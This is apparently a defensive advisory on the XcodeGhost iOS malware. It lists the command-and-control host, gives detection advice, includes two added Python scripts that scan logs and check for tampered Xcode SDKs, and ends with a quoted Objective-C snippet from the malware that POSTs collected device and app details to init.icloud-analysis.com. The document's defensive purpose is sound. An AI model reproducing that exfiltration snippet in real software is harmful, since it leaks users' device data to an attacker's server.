Palo Alto Networks published information about the "XcodeGhost" malware here: http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/
Major apps, including WeChat and Angry Birds 2, are among those infected. The good news is that the command-and-control URL used by XcodeGhost is detectable in the logs of your home firewall, wireless router and business network.
If you're an iPhone user, check your firewall, wireless router or proxy server logs for HTTP traffic to http://init.icloud-analysis.com.
Also, check for and block traffic to these IP addresses used by this malware:
Remove any app from your iPhone that is trying to connect to these IP addresses or to the init.icloud-analysis.com host.
Also, change your passwords on all websites used by the infected applications.
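The log check described above, as an added example that is not part of the original post: a small Python scanner that flags any log line whose URL or host token points at init.icloud-analysis.com (or a subdomain of it), plus any line containing an IPv4 literal from a caller-supplied block list. The Squid-style access log lines are constructed for the demonstration, and the TEST-NET address 192.0.2.10 is a placeholder for the real malware addresses, which you should take from the vendor advisory.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Command-and-control hostname named in the advisory.
C2_HOST = "init.icloud-analysis.com"

# Constructed Squid-style access log lines for demonstration only; not real
# captures. 192.0.2.10 (TEST-NET-1) stands in for the malware's real IP
# addresses, which come from the vendor advisory.
SAMPLE_LOG = """\
1442880001.417    213 10.0.0.23 TCP_MISS/200 612 POST http://init.icloud-analysis.com/ - HIER_DIRECT/192.0.2.10 application/octet-stream
1442880002.001     57 10.0.0.41 TCP_MISS/200 4812 GET http://www.example.com/index.html - HIER_DIRECT/203.0.113.5 text/html
1442880003.990    150 10.0.0.23 TCP_MISS/200 301 GET http://init.icloud-analysis.com/?x=1 - HIER_DIRECT/192.0.2.10 text/plain
1442880004.111     99 10.0.0.77 TCP_MISS/200 1200 GET http://cdn.example.org/a.js - HIER_DIRECT/192.0.2.10 application/javascript
"""

# Dotted-quad literals anywhere in a line (e.g. Squid's HIER_DIRECT/1.2.3.4).
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def host_of(token):
    """Hostname carried by a URL token or a bare host[:port] token, else None."""
    if "://" in token:
        return (urlsplit(token).hostname or "").lower()
    bare = token.rsplit(":", 1)[0] if re.fullmatch(r"[\w.-]+:\d+", token) else token
    if re.fullmatch(r"[A-Za-z0-9.-]+", bare) and "." in bare:
        return bare.lower()
    return None


def classify_line(line, blocked_ips=frozenset()):
    """Return the reasons a log line matches the indicators ([] if clean).

    Works on any whitespace-separated log format: URL and host[:port] tokens
    (so CONNECT lines are caught too) are compared with the C2 hostname and
    its subdomains, and every IPv4 literal is checked against blocked_ips.
    """
    reasons = []
    for token in line.split():
        host = host_of(token)
        if host and (host == C2_HOST or host.endswith("." + C2_HOST)):
            reasons.append("host " + host)
    for ip_text in IPV4_RE.findall(line):
        try:
            ip = str(ipaddress.ip_address(ip_text))  # rejects e.g. 999.1.1.1
        except ValueError:
            continue
        if ip in blocked_ips:
            reasons.append("ip " + ip)
    return reasons


def scan_log(text, blocked_ips=frozenset()):
    """List of (line_number, reasons, line) for every matching line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        reasons = classify_line(line, blocked_ips)
        if reasons:
            hits.append((n, reasons, line))
    return hits


if __name__ == "__main__":
    import sys
    # usage: scan.py access.log [blocked-ip ...]; with no file, runs on SAMPLE_LOG
    blocked = set(sys.argv[2:])
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for n, reasons, line in scan_log(text, blocked):
        print(f"line {n}: {', '.join(reasons)}\n    {line}")
```

Run it against an exported proxy or router log and pass the advisory's IP addresses as extra arguments; the fourth sample line shows why the IP check matters, since a host-only match would miss traffic to a blocked address under a different name.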
If you're an Apple iOS developer, check whether the file Library/Frameworks/CoreServices.framework/CoreService exists inside the Xcode SDK directories under /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/
If it does, you have a malicious version of Xcode rather than the official one from Apple. Delete it, clean up and reinstall the official toolkit from Apple. Only download developer tools from official locations; many publishers provide an MD5/SHA1 hash so you can verify that the file you downloaded is the one they distribute.
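The developer check above, as an added example that is not part of the original post or of any Apple tooling: a Python script that lists every SDK folder under the SDKs directory containing the CoreServices.framework/CoreService marker file, plus a streamed digest routine for comparing a downloaded installer with the hash its publisher lists. The demo directory layout it builds in a temporary folder is constructed so the check can be exercised on any machine; the default SDKs path is the one the advisory names.

```python
import hashlib
import hmac
import sys
import tempfile
from pathlib import Path

# SDKs directory named in the advisory; the iPhoneOS*.sdk folders sit under it.
DEFAULT_SDKS_DIR = Path("/Applications/Xcode.app/Contents/Developer/"
                        "Platforms/iPhoneOS.platform/Developer/SDKs")
# Path of the injected framework binary, relative to an SDK root.
MARKER = Path("Library/Frameworks/CoreServices.framework/CoreService")


def find_suspect_sdks(sdks_dir):
    """Names of SDK folders under sdks_dir that contain the marker file.

    A stock SDK has no CoreServices.framework/CoreService binary at this
    path, so its presence means the SDK was tampered with. Symlinked SDKs
    (for example iPhoneOS.sdk -> iPhoneOS9.0.sdk) are followed and reported.
    """
    sdks_dir = Path(sdks_dir)
    if not sdks_dir.is_dir():
        return []
    return sorted(p.name for p in sdks_dir.iterdir()
                  if p.is_dir() and (p / MARKER).is_file())


def file_digest(path, algo="sha1"):
    """Hex digest of a file, streamed so a multi-GB installer fits in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def matches_published_hash(path, expected_hex, algo="sha1"):
    """True if the file's digest equals the hash published by the vendor."""
    return hmac.compare_digest(file_digest(path, algo), expected_hex.strip().lower())


def make_demo_sdks_dir():
    """Build a constructed SDKs folder in a temp dir (not a real Xcode install):
    one clean SDK and one carrying the marker file, for exercising the check."""
    root = Path(tempfile.mkdtemp(prefix="sdks-demo-"))
    (root / "iPhoneOS9.0.sdk" / "Library" / "Frameworks").mkdir(parents=True)
    tampered = root / "iPhoneOS8.4.sdk" / MARKER
    tampered.parent.mkdir(parents=True)
    tampered.write_bytes(b"abc")  # placeholder contents, not the real binary
    return str(root)


if __name__ == "__main__":
    # usage: check_sdks.py [SDKs-dir]; exits 1 if any SDK carries the marker
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else DEFAULT_SDKS_DIR
    suspect = find_suspect_sdks(target)
    for name in suspect:
        print(f"tampered SDK: {target / name / MARKER}")
    if not suspect:
        print(f"no marker file found under {target}")
    sys.exit(1 if suspect else 0)
```

To verify a fresh download, call matches_published_hash with the installer path and the hash string copied from the vendor's page (SHA1 by default, or pass algo="md5" when that is what they publish); the comparison is constant-time and tolerant of case and surrounding whitespace.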
If you are a developer and interested in more information, the source code of XcodeGhost is on GitHub, here: https://github.com/XcodeGhostSource/XcodeGhost
This shows that it connects as follows:
    NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"];
    NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:url
                                                           cachePolicy:NSURLRequestReloadIgnoringCacheData
                                                       timeoutInterval:30];
    [request setHTTPMethod:@"POST"];
    // concatenatedData holds the collected device and app fields listed below
    [request setValue:[NSString stringWithFormat:@"%lu", (unsigned long)[concatenatedData length]]
         forHTTPHeaderField:@"Content-Length"];
    [request setHTTPBody:concatenatedData];
With the following information sent to the server:
- Application name
- Application version
- OS version
- Developer info
- Application installation type
- Device name
- Device type
Sources: SnoopWall.com, PaloAltoNetworks.com and SANS.edu.